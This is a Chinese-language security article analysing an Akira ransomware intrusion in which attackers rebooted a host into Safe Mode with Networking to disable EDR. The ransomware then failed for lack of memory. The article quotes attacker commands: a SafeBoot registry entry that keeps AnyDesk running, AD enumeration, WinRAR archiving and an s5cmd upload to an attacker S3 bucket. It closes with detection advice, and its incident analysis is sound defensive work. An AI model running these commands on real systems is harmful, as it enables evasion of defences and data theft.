Windows 安全模式很多人都接触过,系统出故障的时候我们会进入安全模式排查问题,但现在勒索攻击者盯上了这个系统自带功能,把它变成绕过安全防护的武器。
近期国外安全公司捕获到 Akira 勒索团伙的全新攻击手法,威胁人员把受害主机重启到带网络的安全模式,借此让 EDR (端点检测与响应)、杀毒工具失效,不过这次攻击出现戏剧性反转,受限的安全模式环境直接把勒索程序搞崩溃,加密行动没能完成,但攻击者早已完成数据窃取,威胁并没有就此解除。
Akira 是近些年活跃度极高的勒索即服务团伙,也是2025 年活动最为频繁的勒索组织,它的附属攻击者已经打磨出一套成熟攻击流程,大多以暴露在外的 SonicWall VPN 作为突破口,横向移动到域控制器,枚举 Active Directory (活动目录),收集并向外导出数据,最后投放勒索加密程序,整套流程往往短短数小时就能全部完成。
过去该团伙为了躲开 EDR 检测,还会在受害者虚拟化平台新建一台全新虚拟机,在没有部署安全agent的机器上运行加密器。类似:黑客组织用 Hyper-V 虚拟机藏木马,绕过检测实现长期控制
本次 8 月初爆发的这起入侵事件,前面流程完全贴合 Akira 的经典套路,同样依靠 SonicWall SSL VPN 破门而入,导出 AdUsers.txt、AdComp.txt 这两份活动目录信息并用记事本查看,借助 WinRAR 打包文件再上传云端,唯独多出一个此前从未在 Akira 攻击中见到的操作,攻击者没有新建虚拟机规避防护,而是直接将被攻陷主机重启到 Safe Mode with Networking (带网络安全模式)。
安全模式是 Windows 的诊断启动模式,只会加载系统必需的驱动和服务,同时保留网络连通能力,绝大多数第三方软件默认不会启动,EDR agent、杀毒软件都属于第三方程序,系统设计层面就不会在安全模式加载它们。
攻击者利用这个特性,一次重启就关停EDR安全agent,同时关闭 Microsoft Defender 实时保护,Defender 此时会抛出错误代码 0x8007043c 提示该服务无法在安全模式启动,在整个安全模式运行期间,主机相当于失去 EDR 和实时杀毒的防护,Snatch、AvosLocker 勒索家族很早就已经在实战使用该手段。
攻击者也提前做好预案,安全模式默认会阻止 AnyDesk 这类第三方远程工具启动,攻击者在重启前就写入注册表项reg.exe add HKEY_LOCAL_MACHINE\\SYSTEM\\CurrentControlSet\\Control\\SafeBoot\\Network\\AnyDesk /ve /d Service,强制让 AnyDesk 可以在带网络安全模式下正常运行,以此维持自己对受害主机的远程控制,整套 AnyDesk 会话连同安全模式操作全程不到十分钟,足以看出攻击者操作流程高度熟练。
完整攻击链路复盘
初始访问:无 MFA 保护的 SonicWall SSL VPN 成为突破口
2026 年 8 月 4 日 UTC 时间 03:45 左右,攻击者针对 SonicWall SSL VPN 发起 credential spraying (凭据喷洒) 攻击,从多个外部 IP 对大量账号批量尝试登录,产生大量用户登录凭据错误的日志记录,仅仅七分钟之后 UTC03:52:42,其中一组账号验证通过完成登录,这套 VPN 完全没有开启 MFA (多因素认证) 防护,直接给攻击者敞开大门。

拿到 VPN 访问权限之后攻击者没有立刻操作,间隔接近两小时才开始人机交互动作,通过 RDP (远程桌面协议) 登录域控制器,拉起提权后的 cmd.exe,ping 探测网络连通性,随即执行 PowerShell 命令完整导出域内全部用户、计算机信息。
执行$formatenumerationlimit = -1这条命令可以取消 PowerShell 对多值属性默认四项截断限制,能够完整捕获账号的所有组归属信息,再通过Get‑ADUser、Get‑ADComputer把域内账号启用状态、邮箱、密码上次修改时间、最后登录日期、设备操作系统、IP 地址等海量信息全部输出保存到 C:\\ProgramData 路径下 AdUsers.txt 与 AdComp.txt 两个文件,这些信息可以用来收集敏感个人信息,同时给攻击者后续横向移动、批量加密绘制完整目标清单,攻击者后续直接用记事本打开这两份文件查看收集结果。

数据收集与外渗:WinRAR 打包 + s5cmd 上传至攻击者 S3 存储桶
完成域信息侦查之后攻击者跳转至应用服务器,现场下载安装 WinRAR,使用参数WinRAR.exe a -ep1 -scul -r0 -iext -imon1 -- . "递归打包多个文件共享目录,这套命令参数也是 Akira 附属攻击者一贯使用的特征。
打包完成后攻击者调用 s5cmd 工具,执行s5cmd cp --sp "E:\\upload*" s3://把打包好的大量数据上传到攻击者掌控的 S3 对象存储桶,这就是典型 double extortion (双重勒索) 手段,就算加密环节失败,攻击者手握窃取的业务文件,依旧可以威胁在暗网论坛泄露数据向受害者施压索要赎金。

AnyDesk 充当远程控制与载荷投递通道
投放勒索程序之前攻击者把 AnyDesk 安装成系统服务设置开机自启,把这款合法远程管理工具滥用为 RAT (远程访问木马) 和 C2 (命令控制) 通道,既可以实现人机交互远程操作,也能用来传输恶意文件。
建立 AnyDesk 会话之后攻击者通过工具自带文件传输推送文件,同时借助剪贴板通道手动粘贴四段文本内容,大小分别约 4KB、296B、2KB、632KB,能看出是攻击者手动粘贴命令而非全自动脚本运行,文件传输结束 27 秒后,名为 akira.exe 的勒索软件进程正式启动。

安全模式反杀勒索程序,攻击出现意外翻车
UTC06:29:21 攻击者运行 msconfig.exe 修改系统启动配置强制主机重启,系统日志 Kernel‑Boot EID27 记录LoadOptions = NOEXECUTE=OPTOUT SAFEBOOT:NETWORK,Kernel‑General EID12 记录BootMode = 2,确认主机进入带网络安全模式。
防护工具全部失效,攻击者拿到理想操作环境,但安全模式精简的运行环境也带来副作用,系统虚拟内存资源受到约束。UTC06:34:29 akira.exe 正式执行,06:36:21 衍生大量子进程,仅仅 13 秒过后系统就连续抛出虚拟内存报错,系统事件 ID26 不断弹出 Windows 虚拟内存过低、虚拟内存耗尽告警,powershell.exe 抛出无法创建新堆栈保护页的异常。
Akira 勒索软件进程树在安全模式内存受限环境下触发 out‑of‑virtual‑memory (虚拟内存耗尽) 故障,加密流程直接中断无法正常开展。
这里要特别区分检测与处置的差异,之后系统定时 Defender 扫描成功识别恶意程序标记为 Ransom:Win32/Akira.B!ibt,但此时主机还处在安全模式,实时保护无法工作,多次 RoutineClean 清理操作返回错误 0x80004005,只能检测却无法隔离清除恶意样本。
直到 UTC08:10:38 攻击者手动把主机重启切回普通 Windows 模式,Microsoft Defender 实时保护功能恢复,在 08:12:28 才成功完成对 akira.exe 的隔离。

这次加密失败属于偶然运气,并不是可靠防御手段,如果受害主机配置更大物理内存、调整页面文件大小,Akira 勒索程序完全有可能在安全模式顺利完成加密,同时 Akira 开发团队或者附属攻击者后续也可以修改加密器代码降低内存开销,这套绕过手段未来依旧具备很高实战威胁。即便文件没有被加密,攻击者已经拿到凭据与大量业务共享文件,数据泄露带来的敲诈风险真实存在,不能因为没有文件加密就低估事件危害。
补齐终端与日志的防护缺口
在企业全部主机部署 EDR Agent,本次事件中安全Agent只覆盖部分设备,攻击者在无监控主机完成大量准备工作
部署 SIEM 平台,完整接入 VPN 日志、Windows 事件日志,VPN 异常登录行为会比勒索加密爆发早数小时,日志留存分析可以争取更多应急响应时间
针对安全模式绕过攻击的专项监控告警
监控系统启动配置修改行为,包含 msconfig.exe、bcdedit 相关操作,重点关注 Kernel‑Boot EID27 携带 SAFEBOOT 启动参数、Kernel‑General EID12 BootMode=2、系统事件 EID7036 记录安全服务停止的日志
告警监测向 SafeBoot 注册表路径新增第三方服务项的行为,攻击者会通过这个操作让自己的远程工具在安全模式也能运行
声明:本文来自黑鸟,版权归作者所有。文章内容仅代表作者独立观点,不代表安全内参立场,转载目的在于传递更多信息。如有侵权,请联系 anquanneican@163.com。